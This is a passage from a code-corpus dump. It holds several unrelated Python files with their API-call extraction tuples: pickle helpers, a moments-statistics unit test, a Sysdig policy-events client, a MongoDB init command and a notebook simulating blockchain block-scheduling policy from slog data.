(['self'], {}), '(self)\n', (4917, 4923), True, 'import chartForm as chartform\n'), ((4932, 4963), 'staffForm.createStaffForm', 'staffform.createStaffForm', (['self'], {}), '(self)\n', (4957, 4963), True, 'import staffForm as staffform\n'), ((4972, 5009), 'customerForm.createCustomerForm', 'customerform.createCustomerForm', (['self'], {}), '(self)\n', (5003, 5009), True, 'import customerForm as customerform\n'), ((5018, 5061), 'appointmentForm.createAppointmentForm', 'appointmentform.createAppointmentForm', (['self'], {}), '(self)\n', (5055, 5061), True, 'import appointmentForm as appointmentform\n'), ((5070, 5101), 'stockForm.createStockForm', 'stockform.createStockForm', (['self'], {}), '(self)\n', (5095, 5101), True, 'import stockForm as stockform\n'), ((5110, 5151), 'treatmentsForm.createTreatmentsForm', 'treatmentsform.createTreatmentsForm', (['self'], {}), '(self)\n', (5145, 5151), True, 'import treatmentsForm as treatmentsform\n'), ((5272, 5300), 'PyQt5.QtWidgets.QToolBar', 'QtWidgets.QToolBar', (['MainMenu'], {}), '(MainMenu)\n', (5290, 5300), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5452, 5482), 'PyQt5.QtWidgets.QStatusBar', 'QtWidgets.QStatusBar', (['MainMenu'], {}), '(MainMenu)\n', (5472, 5482), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((5792, 5839), 'PyQt5.QtCore.QMetaObject.connectSlotsByName', 'QtCore.QMetaObject.connectSlotsByName', (['MainMenu'], {}), '(MainMenu)\n', (5829, 5839), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((13497, 13531), 'qdarkstyle.load_stylesheet_pyqt5', 'qdarkstyle.load_stylesheet_pyqt5', ([], {}), '()\n', (13529, 13531), False, 'import qdarkstyle\n'), ((13717, 13734), 'PyQt5.QtGui.QIcon', 'QtGui.QIcon', (['icon'], {}), '(icon)\n', (13728, 13734), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1492, 1533), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (1513, 1533), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1628, 1641), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (1639, 1641), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1887, 1928), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (1908, 1928), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2019, 2032), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2030, 2032), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2208, 2249), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (2229, 2249), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2346, 2359), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2357, 2359), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2550, 2591), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (2571, 2591), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2685, 2698), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (2696, 2698), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2868, 2909), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (2889, 2909), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2998, 3011), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3009, 3011), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3232, 3273), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (3253, 3273), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3363, 3376), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3374, 3376), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3539, 3580), 'PyQt5.QtWidgets.QPushButton', 'QtWidgets.QPushButton', (['self.centralWidget'], {}), '(self.centralWidget)\n', (3560, 3580), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3675, 3688), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (3686, 3688), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3887, 3923), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralWidget'], {}), '(self.centralWidget)\n', (3903, 3923), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4009, 4022), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (4020, 4022), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4179, 4215), 'PyQt5.QtWidgets.QLabel', 'QtWidgets.QLabel', (['self.centralWidget'], {}), '(self.centralWidget)\n', (4195, 4215), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4301, 4314), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (4312, 4314), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4482, 4526), 'PyQt5.QtWidgets.QStackedWidget', 'QtWidgets.QStackedWidget', (['self.centralWidget'], {}), '(self.centralWidget)\n', (4506, 4526), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4623, 4636), 'PyQt5.QtGui.QFont', 'QtGui.QFont', ([], {}), '()\n', (4634, 4636), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1578, 1607), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(11)', '(40)', '(121)', '(29)'], {}), '(11, 40, 121, 29)\n', (1590, 1607), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((1968, 1998), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(240)', '(121)', '(29)'], {}), '(10, 240, 121, 29)\n', (1980, 1998), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2295, 2325), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(160)', '(121)', '(29)'], {}), '(10, 160, 121, 29)\n', (2307, 2325), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2634, 2664), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(120)', '(121)', '(29)'], {}), '(10, 120, 121, 29)\n', (2646, 2664), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((2948, 2977), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(80)', '(121)', '(29)'], {}), '(10, 80, 121, 29)\n', (2960, 2977), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3312, 3342), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(200)', '(121)', '(29)'], {}), '(10, 200, 121, 29)\n', (3324, 3342), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3624, 3654), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(280)', '(121)', '(29)'], {}), '(10, 280, 121, 29)\n', (3636, 3654), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((3958, 3988), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(320)', '(121)', '(29)'], {}), '(10, 320, 121, 29)\n', (3970, 3988), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4251, 4280), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(10)', '(11)', '(101)', '(17)'], {}), '(10, 11, 101, 17)\n', (4263, 4280), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n'), ((4570, 4602), 'PyQt5.QtCore.QRect', 'QtCore.QRect', (['(140)', '(10)', '(1141)', '(691)'], {}), '(140, 10, 1141, 691)\n', (4582, 4602), False, 'from PyQt5 import QtCore, QtGui, QtWidgets\n')]
|
import cPickle
def load_pickle(filename):
pickled = open(filename, 'rb')
    data = cPickle.load(pickled)
    pickled.close()
    return data
def export_pickle(filename, the_object):
    pickle_file = open(filename, 'wb')
cPickle.dump(the_object, pickle_file)
pickle_file.close()
|
[
"cPickle.dump",
"cPickle.load"
] |
[((91, 112), 'cPickle.load', 'cPickle.load', (['pickled'], {}), '(pickled)\n', (103, 112), False, 'import cPickle\n'), ((214, 251), 'cPickle.dump', 'cPickle.dump', (['the_object', 'pickle_file'], {}), '(the_object, pickle_file)\n', (226, 251), False, 'import cPickle\n')]
|
# Licensed under an MIT open source license - see LICENSE
'''
Test functions for Kurtosis
'''
from unittest import TestCase
import numpy as np
import numpy.testing as npt
from ..statistics import StatMoments, StatMomentsDistance
from ._testing_data import \
dataset1, dataset2, computed_data, computed_distances
class TestMoments(TestCase):
def setUp(self):
self.dataset1 = dataset1
self.dataset2 = dataset2
def test_moments(self):
self.tester = StatMoments(dataset1["integrated_intensity"][0], 5)
self.tester.run()
assert np.allclose(self.tester.kurtosis_hist[1],
computed_data['kurtosis_val'])
assert np.allclose(self.tester.skewness_hist[1],
computed_data['skewness_val'])
def test_moment_distance(self):
self.tester_dist = \
StatMomentsDistance(dataset1["integrated_intensity"][0],
dataset2["integrated_intensity"][0], 5)
self.tester_dist.distance_metric()
npt.assert_almost_equal(self.tester_dist.kurtosis_distance,
computed_distances['kurtosis_distance'])
npt.assert_almost_equal(self.tester_dist.skewness_distance,
computed_distances['skewness_distance'])
|
[
"numpy.testing.assert_almost_equal",
"numpy.allclose"
] |
[((584, 656), 'numpy.allclose', 'np.allclose', (['self.tester.kurtosis_hist[1]', "computed_data['kurtosis_val']"], {}), "(self.tester.kurtosis_hist[1], computed_data['kurtosis_val'])\n", (595, 656), True, 'import numpy as np\n'), ((699, 771), 'numpy.allclose', 'np.allclose', (['self.tester.skewness_hist[1]', "computed_data['skewness_val']"], {}), "(self.tester.skewness_hist[1], computed_data['skewness_val'])\n", (710, 771), True, 'import numpy as np\n'), ((1057, 1161), 'numpy.testing.assert_almost_equal', 'npt.assert_almost_equal', (['self.tester_dist.kurtosis_distance', "computed_distances['kurtosis_distance']"], {}), "(self.tester_dist.kurtosis_distance,\n computed_distances['kurtosis_distance'])\n", (1080, 1161), True, 'import numpy.testing as npt\n'), ((1198, 1302), 'numpy.testing.assert_almost_equal', 'npt.assert_almost_equal', (['self.tester_dist.skewness_distance', "computed_distances['skewness_distance']"], {}), "(self.tester_dist.skewness_distance,\n computed_distances['skewness_distance'])\n", (1221, 1302), True, 'import numpy.testing as npt\n')]
|
import datetime
import requests
from sdcclient._common import _SdcCommon
class PolicyEventsClientV1(_SdcCommon):
def __init__(self, token="", sdc_url='https://secure.sysdig.com', ssl_verify=True, custom_headers=None):
super(PolicyEventsClientV1, self).__init__(token, sdc_url, ssl_verify, custom_headers)
self.customer_id = None
self.product = "SDS"
self._policy_v2 = None
def _get_policy_events_int(self, ctx):
limit = ctx.get("limit", 50)
policy_events_url = self.url + '/api/v1/secureEvents?limit={limit}{frm}{to}{filter}{cursor}'.format(
limit=limit,
frm=f"&from={int(ctx['from']):d}" if "from" in ctx else "",
to=f"&to={int(ctx['to']):d}" if "to" in ctx else "",
filter=f'&filter={ctx["filter"]}' if "filter" in ctx else "",
cursor=f'&cursor={ctx["cursor"]}' if "cursor" in ctx else "")
res = requests.get(policy_events_url, headers=self.hdrs, verify=self.ssl_verify)
if not self._checkResponse(res):
return [False, self.lasterr]
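        # carry the pagination cursor forward so the next call resumes where this one stopped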
ctx = {
"limit": limit,
"cursor": res.json()["page"].get("prev", None)
}
return [True, {"ctx": ctx, "data": res.json()["data"]}]
def get_policy_events_range(self, from_sec, to_sec, filter=None):
'''**Description**
Fetch all policy events that occurred in the time range [from_sec:to_sec]. This method is used in conjunction
with :func:`~sdcclient.SdSecureClient.get_more_policy_events` to provide paginated access to policy events.
**Arguments**
- from_sec: the start of the timerange for which to get events
        - to_sec: the end of the timerange for which to get events
- filter: this is a SysdigMonitor-like filter (e.g. filter: 'severity in ("4","5") and freeText in ("Suspicious")')
**Success Return Value**
An array containing:
- A context object that should be passed to later calls to get_more_policy_events.
- An array of policy events, in JSON format. See :func:`~sdcclient.SdSecureClient.get_more_policy_events`
for details on the contents of policy events.
**Example**
`examples/get_secure_policy_events.py <https://github.com/draios/python-sdc-client/blob/master/examples/get_secure_policy_events.py>`_
'''
options = {"from": int(from_sec) * 1_000_000_000,
"to": int(to_sec) * 1_000_000_000,
"limit": 50,
"filter": filter}
ctx = {k: v for k, v in options.items() if v is not None}
return self._get_policy_events_int(ctx)
def get_policy_events_duration(self, duration_sec, filter=None):
'''**Description**
Fetch all policy events that occurred in the last duration_sec seconds. This method is used in conjunction with
:func:`~sdcclient.SdSecureClient.get_more_policy_events` to provide paginated access to policy events.
**Arguments**
- duration_sec: Fetch all policy events that have occurred in the last *duration_sec* seconds.
- filter: this is a SysdigMonitor-like filter (e.g. filter: 'severity in ("4","5") and freeText in ("Suspicious")')
**Success Return Value**
An array containing:
- A context object that should be passed to later calls to get_more_policy_events.
- An array of policy events, in JSON format. See :func:`~sdcclient.SdSecureClient.get_more_policy_events`
for details on the contents of policy events.
**Example**
`examples/get_secure_policy_events.py <https://github.com/draios/python-sdc-client/blob/master/examples/get_secure_policy_events.py>`_
'''
to_sec = int((datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds())
from_sec = to_sec - (int(duration_sec))
return self.get_policy_events_range(from_sec, to_sec, filter)
def get_more_policy_events(self, ctx):
'''**Description**
Fetch additional policy events after an initial call to :func:`~sdcclient.SdSecureClient.get_policy_events_range` /
:func:`~sdcclient.SdSecureClient.get_policy_events_duration` or a prior call to get_more_policy_events.
**Arguments**
- ctx: a context object returned from an initial call to :func:`~sdcclient.SdSecureClient.get_policy_events_range` /
:func:`~sdcclient.SdSecureClient.get_policy_events_duration` or a prior call to get_more_policy_events.
**Success Return Value**
An array containing:
- A context object that should be passed to later calls to get_more_policy_events()
- An array of policy events, in JSON format. Each policy event contains the following:
- id: a unique identifier for this policy event
- cursor: unique ID that can be used with get_more_policy_events context to retrieve paginated policy events
- timestamp: when the event occurred (ns since the epoch)
- source: the source of the policy event. It can be "syscall" or "k8s_audit"
- description: the description of the event
- severity: a severity level from 1-7
- agentId: the agent that reported this event
- machineId: the MAC of the machine that reported this event
- content: More information about what triggered the event
- falsePositive: if the event is considered a false-positive
- fields: raw information from the rule that fired this event
- output: Output from the rule that fired this event
- policyId: the ID of the policy that fired this event
- ruleName: name of the rule that fired this event
- ruleTags: tags from the rule that fired this event
- labels: more information from the scope of this event
When the number of policy events returned is 0, there are no remaining events and you can stop calling get_more_policy_events().
**Example**
`examples/get_secure_policy_events.py <https://github.com/draios/python-sdc-client/blob/master/examples/get_secure_policy_events.py>`_
'''
return self._get_policy_events_int(ctx)
|
[
"datetime.datetime.utcnow",
"datetime.datetime.utcfromtimestamp",
"requests.get"
] |
[((929, 1003), 'requests.get', 'requests.get', (['policy_events_url'], {'headers': 'self.hdrs', 'verify': 'self.ssl_verify'}), '(policy_events_url, headers=self.hdrs, verify=self.ssl_verify)\n', (941, 1003), False, 'import requests\n'), ((3868, 3894), 'datetime.datetime.utcnow', 'datetime.datetime.utcnow', ([], {}), '()\n', (3892, 3894), False, 'import datetime\n'), ((3897, 3934), 'datetime.datetime.utcfromtimestamp', 'datetime.datetime.utcfromtimestamp', (['(0)'], {}), '(0)\n', (3931, 3934), False, 'import datetime\n')]
|
import click
from motor.motor_asyncio import AsyncIOMotorClient
from pymongo.errors import CollectionInvalid
from app import settings
from scripts.utils import coro
async def create_collection(db: AsyncIOMotorClient, collection_name: str):
"""ๅๅปบ่กจ."""
try:
await db[settings.MONGO_DB].create_collection(collection_name)
except CollectionInvalid as e:
click.echo(e)
else:
click.echo(f"ๅๅปบ{collection_name}ๆๅ\n")
@click.command("initdb")
@coro
async def init_db():
"""ๅๅงๅๆฐๆฎๅบ."""
if click.confirm("ๅๅงๅๆฐๆฎๅบๅฏ่ฝไผๅฏผ่ดๅๆฐๆฎไธขๅคฑ๏ผ็กฎ่ฎค่ฆ็ปง็ปญๅ๏ผ"):
client = AsyncIOMotorClient(settings.db.url)
await create_collection(client, settings.db.collections.user)
await create_collection(client, settings.db.collections.order)
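        # index the fields these collections are queried by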
await client[settings.MONGO_DB][settings.db.collections.order].create_index(
"entrust_id"
)
await create_collection(client, settings.db.collections.position)
await client[settings.MONGO_DB][settings.db.collections.position].create_index(
"user"
)
await client[settings.MONGO_DB][settings.db.collections.position].create_index(
"symbol"
)
await client[settings.MONGO_DB][settings.db.collections.position].create_index(
"exchange"
)
await create_collection(client, settings.db.collections.user_assets_record)
await create_collection(client, settings.db.collections.statement)
click.echo("ๅๅงๅๆฐๆฎๅบๅฎๆ.")
else:
click.echo("ๅๅงๅๆฐๆฎๅบๅคฑ่ดฅ๏ผ็จๆทๆไฝไธญๆญข.")
|
[
"click.confirm",
"click.echo",
"motor.motor_asyncio.AsyncIOMotorClient",
"click.command"
] |
[((455, 478), 'click.command', 'click.command', (['"""initdb"""'], {}), "('initdb')\n", (468, 478), False, 'import click\n'), ((531, 572), 'click.confirm', 'click.confirm', (['"""Initializing the database may cause existing data to be lost. Continue?"""'], {}), "('Initializing the database may cause existing data to be lost. Continue?')\n", (544, 572), False, 'import click\n'), ((413, 451), 'click.echo', 'click.echo', (['f"""Created {collection_name} successfully\n"""'], {}), "(f'Created {collection_name} successfully\\n')\n", (423, 451), False, 'import click\n'), ((591, 626), 'motor.motor_asyncio.AsyncIOMotorClient', 'AsyncIOMotorClient', (['settings.db.url'], {}), '(settings.db.url)\n', (609, 626), False, 'from motor.motor_asyncio import AsyncIOMotorClient\n'), ((1486, 1509), 'click.echo', 'click.echo', (['"""Database initialization complete."""'], {}), "('Database initialization complete.')\n", (1496, 1509), False, 'import click\n'), ((1528, 1558), 'click.echo', 'click.echo', (['"""Database initialization failed: aborted by user."""'], {}), "('Database initialization failed: aborted by user.')\n", (1538, 1558), False, 'import click\n'), ((381, 394), 'click.echo', 'click.echo', (['e'], {}), '(e)\n', (391, 394), False, 'import click\n')]
|
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# formats: ipynb,py:light
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.11.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Block Scheduling Policy Simulation
#
# context: [build model of computron\-to\-wallclock relationship · Issue \#3459 · Agoric/agoric\-sdk](https://github.com/Agoric/agoric-sdk/issues/3459)
# ## Preface: PyData
import pandas as pd
import numpy as np
dict(pandas=pd.__version__,
numpy=np.__version__)
# ## MySql Access
TOP = __name__ == '__main__'
# +
import logging
from sys import stderr
logging.basicConfig(level=logging.INFO, stream=stderr,
format='%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
log = logging.getLogger(__name__)
if TOP:
log.info('notebook start')
# +
from slogdata import mysql_socket, show_times
def _slog4db(database='slog4'):
from sqlalchemy import create_engine
return create_engine(mysql_socket(database, create_engine))
_db4 = _slog4db()
_db4.execute('show tables').fetchall()
# -
# ## Global compute results for agorictest-16
#
# Based on one validator, **Provalidator**.
show_times(pd.read_sql('''
select *
from slog_run
where parent = 'Provalidator'
limit 10
''', _db4), ['time_lo', 'time_hi', 'blockTime_lo', 'blockTime_hi']).iloc[0]
# +
# _db4.execute('''drop table if exists delivery_compute_16''');
# +
def build_consensus_compute(theValidator, db,
table='delivery_compute_16'):
"""We include duration from 1 validator as well.
"""
log.info('creating %s', table)
db.execute(f'''
create table if not exists {table} as
with slog1 as (
select file_id
from file_info
where parent = %(theValidator)s
)
select blockHeight, blockTime, crankNum, vatID, deliveryNum, compute, dur
from j_delivery r
cross join slog1
where r.file_id = slog1.file_id
order by crankNum
''', dict(theValidator=theValidator))
agg = pd.read_sql(f'select count(*) from {table}', db)
log.info('done:\n%s', agg)
return pd.read_sql(f'select * from {table} limit 5', db)
build_consensus_compute('Provalidator', _db4)
# -
_dc16 = pd.read_sql('select * from delivery_compute_16 order by crankNum', _db4, index_col='crankNum')
_dc16.tail()
# `crankNum` goes from 31 to 34; 32 and 33 are missing. Perhaps `create-vat` cranks?
# +
def simulate_run_policy(df, threshold=8e6):
# does 10e6 help with bank update latency?
# only a little: max ~50 rather than ~70
meter = 0
# t_in = t_out = df.blockTime[0]
block_in = block_out = df.blockHeight.values[0]
for crankNum, d in df.iterrows():
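        # when the real chain reaches a new block, let the simulated block catch up and reset the meter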
if d.blockHeight > block_in:
block_in = d.blockHeight
if block_in > block_out:
block_out = block_in
meter = 0
yield block_out # do the work
meter += d.compute
if meter > threshold:
meter = 0
block_out += 1
df = _dc16[_dc16.blockHeight > _dc16.blockHeight.min()]
_sim16 = df.assign(bkSim=list(simulate_run_policy(df)))
_sim16
# -
_sim16[_sim16.bkSim < _sim16.blockHeight]
# +
def sim_aux_stats(df):
df = _sim16
original = df.groupby('blockHeight')
df = original.apply(lambda g: g.assign(
computeInBlock=g.compute.cumsum(),
durationInBlock=g.dur.cumsum()))
df = df.reset_index(level=0, drop=True)
simulated = df.groupby('bkSim')
df = simulated.apply(lambda g: g.assign(
computeInSimBlk=g.compute.cumsum(),
durationInSimBlk=g.dur.cumsum()))
df = df.reset_index(level=0, drop=True)
return df
df = sim_aux_stats(_sim16)
# -
df[['vatID', 'deliveryNum',
'blockHeight',
'compute', 'computeInBlock', 'computeInSimBlk']].describe()
df[['computeInBlock', 'computeInSimBlk']].plot(figsize=(12, 4));
df[['vatID', 'deliveryNum',
'blockHeight',
'dur', 'durationInBlock', 'durationInSimBlk']].describe()
df[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 6));
# ## Computrons go 3.7x faster early in agorictest-16
sim_lo = df[(df.index >= 20000) & (df.index <= 70000)]
sim_lo = sim_lo.reset_index().set_index(['blockHeight', 'crankNum'])
sim_lo = sim_lo.assign(rate=sim_lo.compute / sim_lo.dur)
sim_lo[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 4));
sim_lo[['compute', 'computeInBlock', 'computeInSimBlk',
'dur','durationInBlock', 'durationInSimBlk', 'rate']].describe()
sim_hi = df[df.index >= 250000]
sim_hi = sim_hi.reset_index().set_index(['blockHeight', 'crankNum'])
sim_hi = sim_hi.assign(rate=sim_hi.compute / sim_hi.dur)
sim_hi[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 4));
sim_hi[['compute', 'computeInBlock', 'computeInSimBlk',
'dur','durationInBlock', 'durationInSimBlk', 'rate']].describe()
# +
rate_lo_median = 1.738564e+06
rate_hi_median = 4.711452e+05
round(rate_lo_median / rate_hi_median, 1)
# -
# ## Latency
df['delay'] = df.bkSim - df.blockHeight
df[['delay']].describe()
df[['durationInBlock', 'durationInSimBlk', 'delay']].plot(figsize=(12, 4))
df.sort_values('delay', ascending=False).head(50)
# ## Zoom in on the X axis
103200 and 105500
# +
_zoom = df.loc[103200:105500]
_zoom = _zoom.reset_index().set_index(['blockHeight', 'crankNum'])
_zoom[['computeInBlock', 'computeInSimBlk']].plot(figsize=(12, 4), rot=-75);
# -
x = _zoom.reset_index()
g = x.groupby('bkSim')
x = pd.concat([
    g[['blockHeight']].min(),
    g[['compute']].sum(),
    g[['dur']].sum()
], axis=1)
x = x.assign(delay=x.index - x.blockHeight)
x
x[['compute', 'dur', 'delay']].plot(subplots=True, figsize=(15, 9))
_zoom[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 4), rot=-75);
(df.bkSim - df.blockHeight).describe()
(df.bkSim - df.blockHeight).hist(figsize=(10, 5), bins=72, log=True)
# ## Elapsed time* on the X axis
#
# *estimated as cumulative crank duration
_zoom = df.loc[103273:104400].copy()
# _zoom = df
_zoom['t'] = _zoom.dur.cumsum()
_zoom.set_index('t')[['durationInBlock', 'durationInSimBlk']].plot(figsize=(12, 4), rot=-75);
# ### Detailed Data
_zoom.groupby('bkSim').apply(lambda g: g.head(10))[50:100][[
'dur', 't', 'durationInSimBlk', 'durationInBlock',
'compute', 'computeInSimBlk', 'computeInBlock',
'blockHeight', 'delay'
]]
df.loc[103200:105500][['delay']].plot()
x = pd.read_sql('''
select *
from j_delivery
where crankNum between 103200 and 105500
and file_id = 3288529541296525
''', _db4)
x
show_times(x[x.index.isin([x.index.min(), x.index.max()])])[['crankNum', 'blockHeight', 'blockTime']]
x.blockHeight.max() - x.blockHeight.min()
x.blockHeight.describe()
x[x.compute > 1000000].groupby('method')[['compute', 'dur']].aggregate(['count', 'median', 'mean'])
x = pd.read_sql('''
select *
from t_delivery
where method = 'fromBridge'
and blockHeight between 68817 and 69707
and file_id = 3288529541296525
''', _db4)
x
_db4.execute('''
create index if not exists slog_entry_bk_ix on slog_entry(blockHeight)
''');
_db4.execute('drop index if exists slog_entry_ty_ix on slog_entry');
# +
def bank_trace(db,
limit=250,
file_id=3288529541296525,
bk_lo=68817,
bk_hi=69707):
df = pd.read_sql(
'''
with d as (
select file_id, run_line_lo
, line
, blockHeight
, blockTime
, time
, crankNum
, cast(substr(json_unquote(json_extract(record, '$.vatID')), 2) as int) vatID
, coalesce(cast(json_extract(record, '$.deliveryNum') as int), -1) deliveryNum
, json_extract(record, '$.kd') kd
from slog_entry e
where blockHeight between %(bk_lo)s and %(bk_hi)s
and file_id = %(file_id)s
and type = 'deliver'
limit %(limit)s
),
detail as (
select d.*
, json_unquote(json_extract(d.kd, '$[0]')) tag
, json_unquote(json_extract(d.kd, '$[1]')) target
, json_unquote(json_extract(d.kd, '$[2].method')) method
, json_length(json_unquote(json_extract(d.kd, '$[2].args.body')), '$[1].updated') updated
from d
)
select blockHeight, blockTime, crankNum, vatID, deliveryNum
, tag
, case when tag = 'message' then target else null end target
, method, updated
, time
-- validator-specific: file_id, run_line_lo, line, time
from detail
-- where method = 'fromBridge'
order by blockHeight, crankNum
''', db, params=dict(limit=limit, file_id=file_id, bk_lo=bk_lo, bk_hi=bk_hi))
return df
# x1 = bank_trace(_db4, bk_hi=68817 + 100)
# x2 = bank_trace(_db4, bk_lo=69707 - 100)
# x = pd.concat([x1, x2])
x = bank_trace(_db4, limit=1000)
show_times(x)
# -
x.updated.describe()
x1 = x[~x.updated.isnull()]
color = np.where(x1.vatID == 1, 'blue', 'red')
show_times(x1).plot.scatter(x='time', y='updated', color=color,
figsize=(10, 4), alpha=0.45,
title='Accounts Updated per delivery');
# +
import json
def notifer_traffic(df):
kd = df.record.apply(lambda txt: json.loads(txt)['kd'])
dt = kd.apply(lambda k: k[0])
method = kd.apply(lambda k: k[2].get('method') if k[0] == 'message' else None)
body = kd.apply(lambda k: k[2].get('args', {}).get('body') if k[0] == 'message' else None)
body = body.apply(lambda v: json.loads(v) if v else None)
updated = body.apply(lambda b: len(b[1].get('updated')) if b else None)
# time = pd.as_datetime(df.time.dt.time)
df = df.assign(dt=dt, method=method, body=body, updated=updated)
dur = df.time.diff()
return df.assign(dur=dur)
notifer_traffic(show_times(x2)).drop(columns=['file_id', 'run_line_lo', 'line', 'record', 'body'])
# -
show_times(x2)
x2.record[0]
len(x2.record[0])
# +
import json
r = json.loads(x2.record[0])
body = r['kd'][2]['args']['body']
x = json.loads(body)
# print(json.dumps(r, indent=2))
len(x[1]['updated'])
# -
x2.record[1]
x2.record[2]
|
[
"json.loads",
"logging.basicConfig",
"slogdata.show_times",
"numpy.where",
"pandas.read_sql",
"logging.getLogger",
"slogdata.mysql_socket"
] |
[((723, 860), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'stream': 'stderr', 'format': '"""%(asctime)s %(levelname)s: %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(level=logging.INFO, stream=stderr, format=\n '%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n", (742, 860), False, 'import logging\n'), ((883, 910), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (900, 910), False, 'import logging\n'), ((2341, 2439), 'pandas.read_sql', 'pd.read_sql', (['"""select * from delivery_compute_16 order by crankNum"""', '_db4'], {'index_col': '"""crankNum"""'}), "('select * from delivery_compute_16 order by crankNum', _db4,\n index_col='crankNum')\n", (2352, 2439), True, 'import pandas as pd\n'), ((6499, 6632), 'pandas.read_sql', 'pd.read_sql', (['"""\nselect *\nfrom j_delivery\nwhere crankNum between 103200 and 105500\nand file_id = 3288529541296525\n"""', '_db4'], {}), '(\n """\nselect *\nfrom j_delivery\nwhere crankNum between 103200 and 105500\nand file_id = 3288529541296525\n"""\n , _db4)\n', (6510, 6632), True, 'import pandas as pd\n'), ((6903, 7063), 'pandas.read_sql', 'pd.read_sql', (['"""\nselect *\nfrom t_delivery\nwhere method = \'fromBridge\'\nand blockHeight between 68817 and 69707\nand file_id = 3288529541296525\n"""', '_db4'], {}), '(\n """\nselect *\nfrom t_delivery\nwhere method = \'fromBridge\'\nand blockHeight between 68817 and 69707\nand file_id = 3288529541296525\n"""\n , _db4)\n', (6914, 7063), True, 'import pandas as pd\n'), ((8925, 8938), 'slogdata.show_times', 'show_times', (['x'], {}), '(x)\n', (8935, 8938), False, 'from slogdata import mysql_socket, show_times\n'), ((9002, 9040), 'numpy.where', 'np.where', (['(x1.vatID == 1)', '"""blue"""', '"""red"""'], {}), "(x1.vatID == 1, 'blue', 'red')\n", (9010, 9040), True, 'import numpy as np\n'), ((9997, 10011), 'slogdata.show_times', 